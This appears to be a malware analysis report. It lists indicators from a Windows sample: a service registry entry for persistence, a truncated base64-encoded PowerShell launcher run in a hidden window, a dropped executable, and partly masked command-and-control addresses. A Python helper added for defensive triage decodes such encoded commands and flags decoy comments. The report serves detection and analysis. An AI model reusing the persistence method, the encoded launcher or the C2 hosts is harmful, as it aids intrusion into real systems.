Technical information
- [<HKLM>\System\CurrentControlSet\Services\chinesewhile] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\chinesewhile] 'ImagePath' = '"%WINDIR%\SysWOW64\chinesewhile.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBnAGsAbgB4AGgAbwBtAHMAdAB3ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbQB5AGQAbABvAGEAcwB1AGkAcwAgACMAPgAgACQAUABuAGgAYwB0AHkAagBsAHkAPQAnAE8AbgBh...
- %HOMEPATH%\591.exe
- %HOMEPATH%\591.exe to %WINDIR%\syswow64\chinesewhile.exe
- '18#.#31.163.89':7080
- '85.##4.121.33':8443
- http://te##.#graria.org/wp-admin/6ntxbhvx-369t6xb3t-736626347/
- http://85.###.121.33:8443/sess/
- DNS ASK te##.#graria.org
- '%HOMEPATH%\591.exe'
- '%WINDIR%\syswow64\chinesewhile.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBnAGsAbgB4AGgAbwBtAHMAdAB3ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbQB5AGQAbABvAGEAcwB1AGkAcwAgACMAPgAgACQAUABuAGgAYwB0AHkAagBsAHkAPQAnAE8AbgBh...' (with a hidden window)
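The powershell.exe command line above passes its script through `-enc`, which powershell.exe accepts as a prefix of `-EncodedCommand`: the argument is base64 over the UTF-16LE text of the script, and the page truncates it with "...". The visible prefix decodes to a PowerShell block comment holding a microsoft.com URL, followed by the first variable assignment of the real code; the comment never executes, so that URL is a decoy and not something the script contacts (the actual network indicators are the IPs and hosts listed above). The Python below is an added triage helper, not code from the page or from the analysed sample: it pulls the encoded argument out of a command line, decodes it while tolerating the odd trailing byte a truncated capture leaves behind, and separates the leading comment from the code. The command line it runs on is constructed from the page's own `-enc` argument; the flag-matching rule (documented aliases `-e` and `-ec` plus prefix matching of `-EncodedCommand`, with `/` accepted alongside `-`) is taken from powershell.exe's documented behaviour and is an assumption of this helper rather than something the page states.

```python
import base64
import re

# Base64 argument copied verbatim from the page's powershell.exe command line.
# The page truncates it with "..."; the truncation is kept, nothing is filled in.
ENCODED_ARG = (
    "PAAjACAATwBnAGsAbgB4AGgAbwBtAHMAdAB3ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4A"
    "bQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbQB5AGQAbABvAGEAcwB1AGkAcwAgACMA"
    "PgAgACQAUABuAGgAYwB0AHkAagBsAHkAPQAnAE8AbgBh"
)

# Constructed command line in the shape the page shows (quoted path, -enc, argument).
SAMPLE_CMDLINE = (
    r"'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc " + ENCODED_ARG
)


def is_encoded_command_flag(token: str) -> bool:
    """True for every spelling powershell.exe takes for -EncodedCommand.

    Assumption (documented powershell.exe behaviour, not stated on the page):
    any prefix of the parameter name down to a single letter works (-e, -en,
    -enc, ...), the alias -ec is also accepted, and '/' is allowed in place of '-'.
    """
    if not token or token[0] not in "-/":
        return False
    body = token[1:].lower()
    return body == "ec" or (len(body) >= 1 and "encodedcommand".startswith(body))


def extract_encoded_argument(cmdline: str):
    """Return the base64 token that follows an -EncodedCommand style flag, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_command_flag(tok):
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded_command(b64: str):
    """Decode an -EncodedCommand payload (base64 over UTF-16LE).

    Returns (script_text, leftover_bytes). A log- or page-truncated payload can
    end mid base64 quantum and mid UTF-16 code unit; both cases are handled so a
    partial capture still yields its readable prefix instead of an exception.
    """
    if len(b64) % 4 == 1:          # one dangling base64 char carries no full byte
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)   # restore padding the capture may have lost
    raw = base64.b64decode(b64)
    even = len(raw) - (len(raw) % 2)
    return raw[:even].decode("utf-16-le"), raw[even:]


COMMENT_BLOCK = re.compile(r"^\s*<#(.*?)#>\s*(.*)$", re.S)


def triage(script: str) -> dict:
    """Split a leading <# ... #> block comment from the code after it.

    A script that opens with a comment containing a URL and then assigns a
    random-looking variable deserves a closer look: the comment never runs, so
    any URL inside it is padding or a decoy, not the address the script uses.
    """
    m = COMMENT_BLOCK.match(script)
    if not m:
        return {"decoy_comment": None, "urls_in_comment": [],
                "first_variable": None, "code": script}
    comment, code = m.group(1), m.group(2)
    var = re.match(r"\$(\w+)\s*=", code)
    return {
        "decoy_comment": comment.strip(),
        "urls_in_comment": re.findall(r"https?://\S+", comment),
        "first_variable": var.group(1) if var else None,
        "code": code,
    }


if __name__ == "__main__":
    arg = extract_encoded_argument(SAMPLE_CMDLINE)
    script, leftover = decode_encoded_command(arg)
    print("decoded prefix :", script)
    print("leftover bytes :", leftover)
    for key, value in triage(script).items():
        print(f"{key:15}: {value}")
```

The decoded prefix is `<# Ogknxhomstw https://www.microsoft.com/Lmydloasuis #> $Pnhctyjly='On` with a single stray byte left over, which is exactly what a capture cut mid character looks like; when hunting for the same launcher in process-creation telemetry, match on the flag spellings `is_encoded_command_flag` accepts rather than on the literal `-enc`, since the operator can shorten or lengthen it freely.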